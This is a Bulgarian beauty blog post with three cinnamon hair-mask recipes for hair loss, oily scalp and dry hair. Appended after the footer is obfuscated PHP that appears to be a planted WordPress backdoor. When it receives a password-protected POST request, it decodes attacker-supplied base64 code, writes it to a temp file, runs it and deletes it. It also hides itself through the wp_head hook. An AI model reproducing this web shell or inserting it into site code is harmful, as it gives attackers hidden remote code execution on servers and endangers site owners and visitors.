Как да използваме канелата срещу косопад и при други проблеми с косата? Виж Тук: | Косопад

Как да използваме канелата срещу косопад и при други проблеми с косата? Виж Тук:

Търсите начини да подобрите състоянието на косата си? Искате да изпробвате някакво природно средство? Предлагаме ви не един вариант, а няколко! При това с много достъпна съставка, която всички имаме в кухнята – канела.

Тази ароматна подправка е известна още от древни времена с лечебните си и разкрасителни свойства. Предлагаме ви няколко рецепти с канела при различни проблеми свързани с косата, включително и косопад.

1. Маска от канела и мед за дълбоко почистване
Тази рецепта е много подходяща при мазен скалп. Канелата почиства кожата в дълбочина, а медът я подхранва.
Ако косата ви е суха и склонна към пърхот, маската се прилага само 2 пъти месечно.
Съставки: 4 лъжички канела на прах, 2 лъжици мед, 1 чаша вода
Начин на приготвяне:
Смесваме двете съставки в купичка и разбъркваме, докато се смесят добре. Нанасяме в корените и след като намажем добре навсякъде – слагаме найлон. Изчакваме 20 минути. След това косата се измива с неутрален шампоан, като се прилага мек масаж.

2. Маска от канела и яйце срещу косопад
Яйцето е богато на протеини и антиоксиданти. Тези два елемента са жизненоважни, за да може косата са върне жизнената си сила. Канелата пък стимулира кръвообращението на скалпа, а ефектът й се допълва от отварата от розмарин.
Маската се използва поне веднъж седмично при силен косопад.
Съставки: 2 лъжици канела, яйце, отвара от розмарин
Слагаме 3 клончета от розмарин да се варят в 3 чаши вода. Когато кипне, сваляме от котлона. В отделна купичка разбиваме яйцето. Добавяме канелата към него. Нанасяме маската навсякъде, като правим лек масаж на скалпа за 5 минути. После оставяме да престои още 10. После плакнем с отварата от розмарин.

3. Маска от канела и зехтин за хидратиране на косата
Косата ви е изгубила блясъка си? Има нужда от допълнителна хидратация заради честата употреба на сешоар и преса? Тогава изпробвайте следната маска.
Съставки: 3 лъжици зехтин, 2 лъжици канела
Сипваме зехтина в купичка и загряваме на бавен огън. Добавяме канелата и разбъркваме бавно с кръгообразни движения. Не трябва да става много гореща течността. Само леко да загрее. Нанася се върху мокра коса, като можем да си помагаме с гребена.
Оставяме да престои 20 минути, ако косата е леко увредена. А ако е силно увредена, трябва да спим с маската през нощта.

21. ноември 2017 15:52:20 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}